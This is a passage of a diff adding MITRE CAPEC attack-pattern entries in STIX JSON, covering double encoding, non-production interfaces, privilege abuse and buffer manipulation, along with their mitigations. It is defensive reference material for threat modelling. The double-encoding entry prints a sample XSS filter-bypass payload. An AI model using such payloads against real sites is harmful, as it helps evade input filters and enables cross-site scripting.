", + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_prerequisites": [ + "Information and client-sensitive (and client-specific) data must be present through a distribution channel available to all users.", + "Distribution means must code (through channel, message identifiers, or convention) message destination in a manner visible within the distribution means itself (such as a control channel) or in the messages themselves." + ], + "x_capec_resources_required": [ + "The adversary needs the ability to control source code or application configuration responsible for selecting which message/channel id is absorbed from the public distribution means." + ], + "x_capec_skills_required": { + "Low": "All the adversary needs to discover is the format of the messages on the channel/distribution means and the particular identifier used within the messages." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Associate some ACL (in the form of a token) with an authenticated user which they provide middleware. The middleware uses this token as part of its channel/message selection for that client, or part of a discerning authorization decision for privileged channels/messages.\n The purpose is to architect the system in a way that associates proper authentication/authorization with each channel/message.\n ", + "id": "course-of-action--a9ab8b72-4e44-4c81-bf44-e366ff5503d4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-12-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3057788f-a10c-42ba-86f8-673bdaa92ba0", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a9ab8b72-4e44-4c81-bf44-e366ff5503d4", + "spec_version": "2.1", + "target_ref": "attack-pattern--d9904019-98fa-4beb-ae5a-f667e516269e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Re-architect system input/output channels as appropriate to distribute self-protecting data. That is, encrypt (or otherwise protect) channels/messages so that only authorized readers can see them.", + "id": "course-of-action--dcc7f9fa-ae3e-4b43-ae71-e3c7a72ea187", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-12-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8d1d83e8-400f-438d-a941-c0692758395f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dcc7f9fa-ae3e-4b43-ae71-e3c7a72ea187", + "spec_version": "2.1", + "target_ref": "attack-pattern--d9904019-98fa-4beb-ae5a-f667e516269e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target.", + "external_references": [ + { + "external_id": "CAPEC-120", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-183", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + } + ], + "id": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Double Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Double Enconding Attacks can often be used to bypass Cross Site Scripting (XSS) detection and execute XSS attacks.:\n %253Cscript%253Ealert('This is an XSS Attack')%253C%252Fscript%253E\n Since <, <, and / are often sued to perform web attacks, these may be captured by XSS filters. The use of double encouding prevents the filter from working as intended and allows the XSS to bypass dectection. This can allow an adversary to execute malicious code.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an attacker records all entry points to the application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: Try double-encoding for parts of the input in order to try to get past the filters. For instance, by double encoding certain characters in the URL (e.g. dots and slashes) an adversary may try to get access to restricted resources on the web server or force browse to protected pages (thus subverting the authorization service). An adversary can also attempt other injection style attacks using this attack pattern: command injection, SQL injection, etc.

    2. Techniques
    Try to use double-encoding to bypass validation routines.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target's filters must fail to detect that a character has been doubly encoded but its interpreting engine must still be able to convert a doubly encoded character to an un-encoded character.", + "The application accepts and decodes URL string request.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_resources_required": [ + "Tools that automate encoding of data can assist the adversary in generating encoded strings." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input.", + "id": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--44b07350-79d0-449c-b510-54552ac1b8ac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "spec_version": "2.1", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding.", + "id": "course-of-action--1b63d492-1270-4630-97ef-521ac9d05eec", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cfa73c3f-86a6-476f-aab5-335c5f41f2ac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b63d492-1270-4630-97ef-521ac9d05eec", + "spec_version": "2.1", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When client input is required from web-based forms, avoid using the \"GET\" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the \"POST method whenever possible.", + "id": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e482c72-7993-4ddf-8fca-22de8312c642", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "spec_version": "2.1", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.", + "id": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba444e1f-3d84-4501-b9c6-09b06a824f96", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "spec_version": "2.1", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Refer to the RFCs to safely decode URL.", + "id": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--11ad9490-5c2d-4430-8ecc-b0740ebc3c54", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "spec_version": "2.1", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive.", + "id": "course-of-action--1890182c-6989-4e34-bfb2-92b223bcae0c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0f1b0725-8a4f-49f1-9954-eb67b0182990", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1890182c-6989-4e34-bfb2-92b223bcae0c", + "spec_version": "2.1", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx).", + "id": "course-of-action--24852297-758a-489f-b2c9-a27cbfbb938e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--be25410a-e03c-4307-88da-60d4e71e7f4d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--24852297-758a-489f-b2c9-a27cbfbb938e", + "spec_version": "2.1", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits a sample, demonstration, test, or debug interface that is unintentionally enabled on a production system, with the goal of gleaning information or leveraging functionality that would otherwise be unavailable.\n ", + "external_references": [ + { + "external_id": "CAPEC-121", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/121.html" + }, + { + "external_id": "CWE-489", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/489.html" + }, + { + "external_id": "CWE-1209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1209.html" + }, + { + "external_id": "CWE-1259", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1259.html" + }, + { + "external_id": "CWE-1267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1267.html" + }, + { + "external_id": "CWE-1270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1270.html" + }, + { + "external_id": "CWE-1294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1294.html" + }, + { + "external_id": "CWE-1295", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1295.html" + }, + { + "external_id": "CWE-1296", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1296.html" + }, + { + "external_id": "CWE-1302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1302.html" + }, + { + "external_id": "CWE-1313", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1313.html" + }, + { + "description": "Swarup Bhunia, Mark M. Tehranipoor, The Hardware Trojan War: Attacks, Myths, and Defenses, 2017--11---30, Springer", + "external_id": "REF-588", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Boyang Du, Matteo Sonza Reorda, Luca Sterpone, Luis Parra, Marta Portela-Garcia, Almudena Lindoso, Luis Entrena, Exploiting the debug interface to support on-line test of control flow errors, 2013--07---08, Institute of Electrical and Electronics Engineers (IEEE)", + "external_id": "REF-589", + "source_name": "reference_from_CAPEC", + "url": "https://ieeexplore.ieee.org/document/6604058/authors#authors" + } + ], + "id": "attack-pattern--b289975f-c5e0-4d27-bf50-5937bfd02cfd", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Exploit Non-Production Interfaces", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f4186110-0c20-42fa-bc6f-d0ff9f700f91" + ], + "x_capec_consequences": { + "Access_Control": [ + "Modify Data", + "Alter Execution Logic" + ], + "Authentication": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Read Data", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Gain Privileges", + "Bypass Protection Mechanism", + "Read Data", + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Modify Data", + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Some software applications include application programming interfaces (APIs) that are intended to allow an administrator to test and refine their domain. These APIs are typically disabled once a system enters a production environment, but may be left in an insecure state due to a configuration error or mismanagement.\n ", + "\n Many hardware systems leverage bits typically reserved for future functionality for testing and debugging purposes. If these reserved bits remain enabled in a production environment, it could allow an adversary to induce unwanted/unsupported behavior in the hardware.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Vulnerable Interface: An adversary explores a target system for sample or test interfaces that have not been disabled by a system administrator and which may be exploitable by the adversary.

    2. Techniques
    If needed, the adversary explores an organization's network to determine if any specific systems of interest exist.

Exploit

  1. Leverage Test Interface to Execute Attacks: Once an adversary has discovered a system with a non-production interface, the interface is leveraged to exploit the system and/or conduct various attacks.

    2. Techniques
    The adversary can leverage the sample or test interface to conduct several types of attacks such as Adversary-in-the-Middle attacks (CAPEC-94), keylogging, Cross Site Scripting (XSS), hardware manipulation attacks, and more.
", + "x_capec_extended_description": "\n Non-production interfaces are insecure by default and should not be resident on production systems, since they may reveal sensitive information or functionality that should not be known to end-users. However, such interfaces may be unintentionally left enabled on a production system due to configuration errors, supply chain mismanagement, or other pre-deployment activities.\n Ultimately, failure to properly disable non-production interfaces, in a production environment, may expose a great deal of diagnostic information or functionality to an adversary, which can be utilized to further refine their attack. Moreover, many non-production interfaces do not have adequate security controls or may not have undergone rigorous testing since they were not intended for use in production environments. As such, they may contain many flaws and vulnerabilities that could allow an adversary to severely disrupt a target.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517" + ], + "x_capec_prerequisites": [ + "The target must have configured non-production interfaces and failed to secure or remove them when brought into a production environment." + ], + "x_capec_resources_required": [ + "For some interfaces, the adversary will need that appropriate client application or hardware that interfaces with the interface. Other non-production interfaces can be executed using simple tools, such as web browsers or console windows. In some cases, an adversary may need to be able to authenticate to the target before it can access the vulnerable interface." + ], + "x_capec_skills_required": { + "High": "Exploiting non-production interfaces requires significant skill and knowledge about the potential non-production interfaces left enabled in production." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that production systems do not contain non-production interfaces and that these interfaces are only used in development environments.", + "id": "course-of-action--36f8b35a-423d-47cf-85a2-766434c723ab", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-121-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--faafe0e8-4e6c-4405-a59d-22f1ce919834", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36f8b35a-423d-47cf-85a2-766434c723ab", + "spec_version": "2.1", + "target_ref": "attack-pattern--b289975f-c5e0-4d27-bf50-5937bfd02cfd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources.", + "external_references": [ + { + "external_id": "CAPEC-122", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/122.html" + }, + { + "external_id": "CWE-269", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/269.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-1317", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1317.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + } + ], + "id": "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Privilege Abuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_precede_refs": [ + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Improperly configured account privileges allowed unauthorized users on a hospital's network to access the medical records for over 3,000 patients. Thus compromising data integrity and confidentiality in addition to HIPAA violations.\n " + ], + "x_capec_extended_description": "\n If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts.\n This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac", + "attack-pattern--d9717514-c621-49cd-b8e1-fd7cc1daa8d1", + "attack-pattern--c195a0a3-62fc-4def-9702-8938440cc9a7" + ], + "x_capec_prerequisites": [ + "The target must have misconfigured their access control mechanisms such that sensitive information, which should only be accessible to more trusted users, remains accessible to less trusted users.", + "The adversary must have access to the target, albeit with an account that is less privileged than would be appropriate for the targeted resources." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The ability to access the target is required." + ], + "x_capec_skills_required": { + "Low": "Adversary can leverage privileged features they already have access to without additional effort or skill. Adversary is only required to have access to an account with improper priveleges." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configure account privileges such privileged/administrator functionality is not exposed to non-privileged/lower accounts.", + "id": "course-of-action--556e719c-c102-427d-b5b4-11a4dab62f8e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-122-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--957019cc-30e1-4d46-9ee9-1b20f9b69653", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--556e719c-c102-427d-b5b4-11a4dab62f8e", + "spec_version": "2.1", + "target_ref": "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates an application's interaction with a buffer in an attempt to read or modify data they shouldn't have access to. Buffer attacks are distinguished in that it is the buffer space itself that is the target of the attack rather than any code responsible for interpreting the content of the buffer. In virtually all buffer attacks the content that is placed in the buffer is immaterial. Instead, most buffer attacks involve retrieving or providing more input than can be stored in the allocated buffer, resulting in the reading or overwriting of other unintended program memory.", + "external_references": [ + { + "external_id": "CAPEC-123", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/123.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + } + ], + "id": "attack-pattern--476ca631-2695-43f8-82f6-83c06a07ae36", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Buffer Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A buffer manipulation attack often results in a crash of the application due to the corruption of memory.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (If constructed properly, a buffer manipulation attack can be used to contol the execution of the application leading to any number of negative consequenses.)", + "Modify Data (If constructed properly, a buffer manipulation attack can be used to contol the execution of the application leading to any number of negative consequenses.)", + "Read Data (If constructed properly, a buffer manipulation attack can be used to contol the execution of the application leading to any number of negative consequenses.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "attack-pattern--40eddae8-4d7d-4fc3-b220-1c9706f01a96" + ], + "x_capec_prerequisites": [ + "The adversary must identify a programmatic means for interacting with a buffer, such as vulnerable C code, and be able to provide input to this interaction." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To help protect an application from buffer manipulation attacks, a number of potential mitigations can be leveraged. Before starting the development of the application, consider using a code language (e.g., Java) or compiler that limits the ability of developers to act beyond the bounds of a buffer. If the chosen language is susceptible to buffer related issues (e.g., C) then consider using secure functions instead of those vulnerable to buffer manipulations. If a potentially dangerous function must be used, make sure that proper boundary checking is performed. Additionally, there are often a number of compiler-based mechanisms (e.g., StackGuard, ProPolice and the Microsoft Visual Studio /GS flag) that can help identify and protect against potential buffer issues. Finally, there may be operating system level preventative functionality that can be applied.", + "id": "course-of-action--69611262-87d4-4bba-8db4-068c40577c4c", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-123-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": 